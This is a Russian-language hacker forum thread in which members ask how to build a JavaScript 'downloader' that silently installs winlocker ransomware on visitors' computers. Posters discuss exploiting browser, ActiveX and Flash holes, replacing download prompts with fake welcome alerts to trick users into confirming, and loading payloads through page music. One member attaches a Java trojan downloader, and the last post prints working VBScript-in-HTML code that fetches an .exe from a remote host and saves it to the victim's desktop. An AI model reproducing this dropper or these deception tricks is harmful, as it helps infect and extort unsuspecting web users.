|
JS downloader
|
|
| oke | Дата: Воскресенье, 22.04.2012, 16:38 | Сообщение # 1 |
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
| фооумчане никто не знает как реализовать js.downloader как это используют винлоки? java знаю на 0 подскажите если не сложно...
|
| |
| |
| xXxSh@dowxXx | Дата: Воскресенье, 22.04.2012, 18:17 | Сообщение # 2 |
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
| то есть ты имеешь ввиду что бы при заходе на сайт при помощи ява-скрипта начиналась скрытая загрузка или ты хочешь прям из самой винды как обычный довнлоадер только при помощи явы?
|
| |
| |
| oke | Дата: Среда, 25.04.2012, 21:02 | Сообщение # 3 |
|
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
| да именно так винлоки поподают на комп
|
| |
| |
| xXxSh@dowxXx | Дата: Среда, 25.04.2012, 21:29 | Сообщение # 4 |
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
| ну вобще без знания уязвимостей (желательно новых), тут не обойтись, в основном они используют именно уязвимости браузеров, ActiveX, Flash и прочего..., на мой взгляд более простой способ найти shell (лучше этого года и как можно новее), и использовать его в своей программе...
но это уже более широкая тема и о ней можно говорить часами 
Сообщение отредактировал xXxSh@dowxXx - Среда, 25.04.2012, 21:30 |
| |
| |
| Don_Diego | Дата: Воскресенье, 29.04.2012, 16:49 | Сообщение # 5 |
Продвинутый
Зарегистрирован: 16.04.2012
Группа: Пользователи
Сообщений: 253
Статус: Offline
| Эти способы еще возможно было использовать, но только к браузеру Internet Explorer, а также браузерам на его движке (MyIE, Maxthon). Эти браузеры "кушают" почти все что предложишь
А вот если взять более защищенные браузеры, к примеру Opera, Mozilla - тут такая фишка не пройдет. Не знаю по поводу браузера Google Chrome, т.к. очень мало его тестил.
|
| |
| |
| xXxSh@dowxXx | Дата: Воскресенье, 29.04.2012, 17:12 | Сообщение # 6 |
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
| Quote (Don_Diego) А вот если взять более защищенные браузеры, к примеру Opera, Mozilla - тут такая фишка не пройдет
ну почему же не пройдет, я же говорю, сейчас можно нарыть не малое количество сплоитов из которых можно взять за использование дыру на любой браузер, и уже через нее можно загружать что угодно и как угодно...
в основном нынешние загрузчики как раз и используют подобные уязвимости, но так как эти уязвимости быстро фиксят и исправляют, то и сам код загрузчиков приходится частенько переписывать, еще где то читал раньше что есть java код, java script который прописывается в коде странички самим админом сайта, суть его как раз и заключается в том что юзер переходя по ссылке и попадая на страничку с этим скриптом автоматически начинает загрузку, но если я не ошибаюсь, загрузка не скрытная как при использовании уязвимости, а открытая, то есть пользователю выдается диалоговое окно с выбором "Открыть" "Сохранить" "Отмена"...
Сообщение отредактировал xXxSh@dowxXx - Воскресенье, 29.04.2012, 17:21 |
| |
| |
| Don_Diego | Дата: Воскресенье, 29.04.2012, 18:01 | Сообщение # 7 |
|
Продвинутый
Зарегистрирован: 16.04.2012
Группа: Пользователи
Сообщений: 253
Статус: Offline
| xXxSh@dowxXx, конечно, это самый распространенный способ взломов вообще. Но я их не люблю, все по тому что:
Quote (xXxSh@dowxXx) но так как эти уязвимости быстро фиксят и исправляют, то и сам код загрузчиков приходится частенько переписывать,
И тут не только код переписывать нужно будет - а еще и найти новую уязвимость. А в конечном итоге все сводится к тому что программы стают почти идеальными. Взять к примеру Windows 95/98, NT. Их же переламали все кому не лень, и посмотреть на новые версии ОС...
Я конечно веб-программированием не занимался, но знаю что загрузчики делали через музыку. Да, да, ту самую музыку что играет на некоторых сайтах. Там подтверждения на загрузку не спрашивается, но опять же - это уязвимость. И нет уверенности в том что ее сейчас не пофиксили.
|
| |
| |
| xXxSh@dowxXx | Дата: Понедельник, 30.04.2012, 09:45 | Сообщение # 8 |
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
| Quote (Don_Diego) знаю что загрузчики делали через музыку
да, тут ты прав, и вполне возможно что будет при некоторых доработках работать и сейчас, ок будем думать... 
|
| |
| |
| XSPY | Дата: Понедельник, 30.04.2012, 13:15 | Сообщение # 9 |
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 263
Статус: Offline
| а что мешает использовать те же яваскрипты и скрытую загрузку?например,перешел на страницу-началась загрузка и вылазит алерт,а мы этот алерт на свой типа "Добро пожаловать...ляляля...ОК" надал чел ОК-подтвердило загрузку,докачало и автозапуск...
З.Ы:У кого нить остались сорсы 95-98 винды?они были в сети тогда пару дней (до недели),полюбому кто-то успел слить себе...
|
| |
| |
| xXxSh@dowxXx | Дата: Понедельник, 30.04.2012, 18:18 | Сообщение # 10 |
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
| XSPY только нада учитывать еще тот факт что у пользователя выскочит окно загрузки в котором видно что, и откуда качается, да еще и по завершению загрузки сам браузер выведет уведомление, не говоря уже о том что при обычной загрузке файл просто сохраняется, но не запускается...
если кто то найдет скрипт который скрытно загружает, да еще и запускает файл после загрузки, выложите ссылку если вас не затруднит, думаю многим интересно было бы посмотреть...
|
| |
| |
| oke | Дата: Понедельник, 30.04.2012, 23:22 | Сообщение # 11 |
|
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
| да я проверял на каком то сайте там как раз с помощью js opera mazila chrome все загружалось и запускалось(винлок) ради этого систему 3 раза восстанавливал) ну а ie нет смысла проверять
|
| |
| |
| xXxSh@dowxXx | Дата: Понедельник, 30.04.2012, 23:35 | Сообщение # 12 |
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
| oke и у тебя есть такой винлок?
|
| |
| |
| oke | Дата: Вторник, 05.06.2012, 19:50 | Сообщение # 13 |
|
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
| нет я как то бродил по нету и наткнулся на наге вот совсем недавно
|
| |
| |
| link993 | Дата: Вторник, 05.06.2012, 20:12 | Сообщение # 14 |
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
| Вот прикладываю троянчик довнлоадер на java. Он не мой. Попробуй декомпильнуть, может быть что и получится!
|
| |
| |
| oke | Дата: Пятница, 08.06.2012, 16:43 | Сообщение # 15 |
|
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
| я честно говоря java вообще не знаю 
|
| |
| |
| oke | Дата: Пятница, 08.06.2012, 17:09 | Сообщение # 16 |
|
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
| http://www.securitylab.ru/virus/406668.php вот что нарыл ну я вообще в java 0
|
| |
| |
| oke | Дата: Пятница, 08.06.2012, 17:22 | Сообщение # 17 |
|
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
| http://jokeroro.narod.ru/CHKOLA-6/index_0_1_5_5_a.html вот сайт там играет музыка даже после закрытия вкладки значит музыка во временной каталог скачалась и там преведены примеры скриптов если кто разбирается может посмотреть может и получится downloader
|
| |
| |
| MAS | Дата: Пятница, 16.08.2013, 17:41 | Сообщение # 18 |
Участник
Зарегистрирован: 16.08.2013
Группа: Пользователи
Сообщений: 67
Статус: Offline
| Цитата (oke) http://jokeroro.narod.ru/CHKOLA-6/index_0_1_5_5_a.html вот
!! Я недавно на компе нашел бота, бота создал joker и еще какой-то пи-ас, на комп видимо с помощью js downloadera попало, и вот я вижу сайт jokerroro с довнлоадером, осторожноДобавлено (16.08.2013, 17:41)
---------------------------------------------
Ты знаешь что в html можно встроить vbs скрипт? Только exe файлы редактируются и перестают работать, если только в аинраре, антивирус говорит мне когда я перехажу на страницу что там троян downloader.
вот это в html вставь
<HTML>
<HEAD>
<TITLE>VBS+html</TITLE>
<SCRIPT language=VBScript>
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
oXMLHTTP.Open "GET", "http://domain.com/by_MAS.exe", 0'
oXMLHTTP.Send
Set oADOStream = CreateObject("ADODB.Stream")
oADOStream.Mode = 3
oADOStream.Type = 1
oADOStream.Open
oADOStream.Write oXMLHTTP.responseBody
oADOStream.SaveToFile "C:\Users\User\Desktop\by_MAS2.exe", 2'
</SCRIPT>
За одну ночь нельзя изменить свою жизнь, но за одну ночь можно изменить мысли которые изменят твою жизнь. (MAS)
|
| |
| |
